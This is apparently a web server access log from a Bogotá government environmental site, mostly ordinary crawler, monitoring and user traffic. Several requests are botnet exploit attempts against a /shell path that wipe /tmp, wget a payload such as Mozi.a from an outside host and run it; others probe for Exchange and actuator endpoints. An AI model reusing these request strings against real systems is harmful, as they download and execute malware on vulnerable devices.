172.22.2.4 - - [05/Apr/2022:01:34:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [05/Apr/2022:01:36:54 -0500] "HEAD / HTTP/1.1" 200 -
2.57.121.50 - - [05/Apr/2022:01:37:46 -0500] "GET / HTTP/1.0" 200 319
66.249.65.13 - - [05/Apr/2022:01:38:19 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:01:38:22 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
103.178.236.95 - - [05/Apr/2022:01:38:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:01:39:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.151.86 - - [05/Apr/2022:01:41:00 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:01:40:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [05/Apr/2022:01:41:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:42:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
201.245.192.253 - - [05/Apr/2022:01:42:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42737
201.245.192.253 - - [05/Apr/2022:01:43:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45612
172.22.2.4 - - [05/Apr/2022:01:45:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:01:46:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:01:46:56 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:01:45:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
216.245.221.92 - - [05/Apr/2022:01:51:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:50:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:51:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60105
172.22.2.4 - - [05/Apr/2022:01:54:31 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
172.22.2.4 - - [05/Apr/2022:01:55:02 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
216.245.221.92 - - [05/Apr/2022:01:56:54 -0500] "HEAD / HTTP/1.1" 200 -
34.141.144.166 - - [05/Apr/2022:01:56:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:01:56:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:57:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
117.103.87.163 - - [05/Apr/2022:02:00:34 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+158.51.124.114/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [05/Apr/2022:02:01:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:02:02:38 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:02:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:03:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [05/Apr/2022:02:06:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.199 - - [05/Apr/2022:02:08:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
45.155.204.146 - - [05/Apr/2022:02:08:34 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [05/Apr/2022:02:08:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:09:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [05/Apr/2022:02:11:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:02:15:33 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:14:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:15:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
216.245.221.92 - - [05/Apr/2022:02:16:54 -0500] "HEAD / HTTP/1.1" 200 -
114.119.136.160 - - [05/Apr/2022:02:20:32 -0500] "-" 408 -
114.119.132.149 - - [05/Apr/2022:02:21:02 -0500] "-" 408 -
114.119.151.219 - - [05/Apr/2022:02:21:33 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:20:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:21:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [05/Apr/2022:02:21:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:02:22:01 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:20:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
201.245.192.253 - - [05/Apr/2022:02:22:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42882
201.245.192.253 - - [05/Apr/2022:02:23:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45445
175.100.16.143 - - [05/Apr/2022:02:25:55 -0500] "GET / HTTP/1.1" 200 319
40.77.167.28 - - [05/Apr/2022:02:26:12 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
216.245.221.92 - - [05/Apr/2022:02:26:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:25:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:26:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
2.57.121.50 - - [05/Apr/2022:02:29:52 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [05/Apr/2022:02:30:12 -0500] "-" 408 -
216.245.221.92 - - [05/Apr/2022:02:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:02:32:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42882
172.22.2.4 - - [05/Apr/2022:02:31:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:02:33:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45445
20.36.244.102 - - [05/Apr/2022:02:33:38 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
172.22.2.4 - - [05/Apr/2022:02:32:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
157.55.39.149 - - [05/Apr/2022:02:35:19 -0500] "-" 408 -
106.75.251.164 - - [05/Apr/2022:02:35:35 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [05/Apr/2022:02:36:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:02:38:04 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:37:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:38:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
120.86.238.36 - - [05/Apr/2022:02:40:26 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
216.245.221.92 - - [05/Apr/2022:02:41:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:02:42:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42882
207.46.13.199 - - [05/Apr/2022:02:43:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
201.245.192.253 - - [05/Apr/2022:02:43:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45445
66.249.65.13 - - [05/Apr/2022:02:44:49 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:43:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:44:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [05/Apr/2022:02:46:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:02:50:31 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:49:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:50:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [05/Apr/2022:02:51:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:52:15 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
2.57.121.50 - - [05/Apr/2022:02:54:06 -0500] "GET / HTTP/1.1" 200 319
207.46.13.209 - - [05/Apr/2022:02:56:13 -0500] "GET /bla/resoluciones/autos%202020/4464.pdf HTTP/1.1" 200 421019
66.249.65.13 - - [05/Apr/2022:02:56:16 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:02:55:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:02:56:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:02:55:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [05/Apr/2022:03:01:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:03:01:55 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:03:00:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:01:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
173.252.127.12 - - [05/Apr/2022:03:03:40 -0500] "GET /images/estacion-monitoreo-usme-29-marzo.jpg HTTP/1.1" 200 30383
173.252.107.23 - - [05/Apr/2022:03:03:48 -0500] "GET /images/feria-servicios-principal-24-marzo.jpg HTTP/1.1" 200 37032
173.252.107.15 - - [05/Apr/2022:03:03:48 -0500] "GET /images/jornada-llantaton-usaquen-24-marzo.jpg HTTP/1.1" 200 41830
159.223.17.88 - - [05/Apr/2022:03:06:13 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Apr/2022:03:06:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:06:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:03:08:23 -0500] "-" 408 -
181.61.209.235 - - [05/Apr/2022:03:08:34 -0500] "GET /secretaria-de-ambiente-rechaza-actos-que-habrian-podido-afectar-la-fauna-y-flora-en-el-humedal-jaboque.html HTTP/1.1" 200 1113
172.22.2.4 - - [05/Apr/2022:03:07:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
207.46.13.43 - - [05/Apr/2022:03:10:40 -0500] "GET /BLA/resoluciones/AUTOS%202018/4447.pdf HTTP/1.1" 304 -
54.39.103.203 - - [05/Apr/2022:03:10:59 -0500] "GET /secretaria-de-ambiente-realizo-operativo-de-control-a-establecimientos-generadores-de-residuos-hospitalarios.html HTTP/1.1" 200 970
192.99.44.57 - - [05/Apr/2022:03:11:00 -0500] "GET /secretaria-de-ambiente-rechaza-actos-que-habrian-podido-afectar-la-fauna-y-flora-en-el-humedal-jaboque.html HTTP/1.1" 200 1113
216.245.221.92 - - [05/Apr/2022:03:11:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.199 - - [05/Apr/2022:03:13:46 -0500] "GET /bla/resoluciones/resoluciones%202022/0313.pdf HTTP/1.1" 200 392814
172.22.2.4 - - [05/Apr/2022:03:12:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [05/Apr/2022:03:14:21 -0500] "-" 408 -
207.46.13.43 - - [05/Apr/2022:03:14:40 -0500] "GET /bla/resoluciones/resoluciones%202018/0344.pdf HTTP/1.1" 200 462271
172.22.2.4 - - [05/Apr/2022:03:13:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
216.245.221.92 - - [05/Apr/2022:03:16:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:17:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [05/Apr/2022:03:17:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
172.22.2.4 - - [05/Apr/2022:03:18:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:18:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47760
200.118.64.109 - - [05/Apr/2022:03:20:25 -0500] "GET /forms/frmservlet?config=sia HTTP/1.1" 200 4046
200.118.64.109 - - [05/Apr/2022:03:20:26 -0500] "GET /forms/frmservlet?config=sia HTTP/1.1" 200 4046
200.118.64.109 - - [05/Apr/2022:03:20:26 -0500] "GET /forms/java/frmall_jinit.jar HTTP/1.1" 304 -
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/java/icons.jar HTTP/1.1" 304 -
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/java/java/awt/KeyboardFocusManager.class HTTP/1.1" 404 352
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/java/java/awt/event/MouseWheelListener.class HTTP/1.1" 404 356
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/java/oracle/forms/registry/Registry.dat HTTP/1.1" 200 4213
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/java/oracle/forms/registry/default.dat HTTP/1.1" 404 350
200.118.64.109 - - [05/Apr/2022:03:20:27 -0500] "GET /forms/frmservlet?config=sia&acceptLanguage=en-us,en;q=0.5&ifcmd=startsession HTTP/1.1" 200 119
200.118.64.109 - - [05/Apr/2022:03:20:28 -0500] "GET /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe?ifcmd=getinfo HTTP/1.1" 200 8
200.118.64.109 - - [05/Apr/2022:03:20:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 8
200.118.64.109 - - [05/Apr/2022:03:20:29 -0500] "GET /forms/java/oracle/forms/engine/RunformBundle_es_CO.class HTTP/1.1" 404 362
200.118.64.109 - - [05/Apr/2022:03:20:29 -0500] "GET /forms/java/oracle/forms/engine/RunformBundle_es_CO.properties HTTP/1.1" 404 367
200.118.64.109 - - [05/Apr/2022:03:20:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64000
200.118.64.109 - - [05/Apr/2022:03:20:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64000
200.118.64.109 - - [05/Apr/2022:03:20:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 63623
200.118.64.109 - - [05/Apr/2022:03:20:30 -0500] "HEAD /imagenes/dama_logo.gif HTTP/1.1" 200 -
200.118.64.109 - - [05/Apr/2022:03:20:31 -0500] "GET /imagenes/dama_logo.gif HTTP/1.1" 200 21482
200.118.64.109 - - [05/Apr/2022:03:20:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:20:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:20:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 187
200.118.64.109 - - [05/Apr/2022:03:20:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 32
66.249.65.13 - - [05/Apr/2022:03:20:44 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:03:19:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52081
200.118.64.109 - - [05/Apr/2022:03:20:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 7886
200.118.64.109 - - [05/Apr/2022:03:20:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 64
200.118.64.109 - - [05/Apr/2022:03:20:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:20:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:20:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:21:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 34714
200.118.64.109 - - [05/Apr/2022:03:21:01 -0500] "GET /imagenes/listval.gif HTTP/1.1" 200 905
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/tree1.gif HTTP/1.1" 200 1161
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/listval.gif HTTP/1.1" 200 905
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/CAMERA3.gif HTTP/1.1" 200 4150
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/SLIDE1.gif HTTP/1.1" 200 1111
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/flexcomb.gif HTTP/1.1" 200 1169
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/GO.gif HTTP/1.1" 200 904
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/HRTOOLS.gif HTTP/1.1" 200 2238
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_rec1.gif HTTP/1.1" 200 867
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/apply.gif HTTP/1.1" 200 903
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/exit.gif HTTP/1.1" 200 916
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/LISTVAL.gif HTTP/1.1" 200 905
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/edit.gif HTTP/1.1" 200 919
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_rec4.gif HTTP/1.1" 200 865
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_rec3.gif HTTP/1.1" 200 844
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_rec2.gif HTTP/1.1" 200 847
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_rdel.gif HTTP/1.1" 200 899
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_radd.gif HTTP/1.1" 200 907
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_quer3.gif HTTP/1.1" 200 939
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_quer2.gif HTTP/1.1" 200 936
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_quer1.gif HTTP/1.1" 200 930
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_save.gif HTTP/1.1" 200 903
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/rt_pset.gif HTTP/1.1" 200 914
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/QUEJA.gif HTTP/1.1" 200 1091
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/ARBOL.gif HTTP/1.1" 200 1026
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/Clipboard.gif HTTP/1.1" 200 1466
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/DINERO.gif HTTP/1.1" 200 1766
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/URGENTE.gif HTTP/1.1" 200 964
200.118.64.109 - - [05/Apr/2022:03:21:02 -0500] "GET /imagenes/TREE4.gif HTTP/1.1" 200 4150
200.118.64.109 - - [05/Apr/2022:03:21:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 7
200.118.64.109 - - [05/Apr/2022:03:21:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 34
200.118.64.109 - - [05/Apr/2022:03:21:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:21:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:21:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 699
200.118.64.109 - - [05/Apr/2022:03:21:05 -0500] "GET /imagenes/Srch_frw.gif HTTP/1.1" 200 925
200.118.64.109 - - [05/Apr/2022:03:21:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 10
200.118.64.109 - - [05/Apr/2022:03:21:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 24
200.118.64.109 - - [05/Apr/2022:03:21:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 4280
200.118.64.109 - - [05/Apr/2022:03:21:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:21:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [05/Apr/2022:03:21:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [05/Apr/2022:03:21:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:21:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:21:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:21:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:21:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
216.245.221.92 - - [05/Apr/2022:03:21:54 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [05/Apr/2022:03:21:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:22:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:22:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
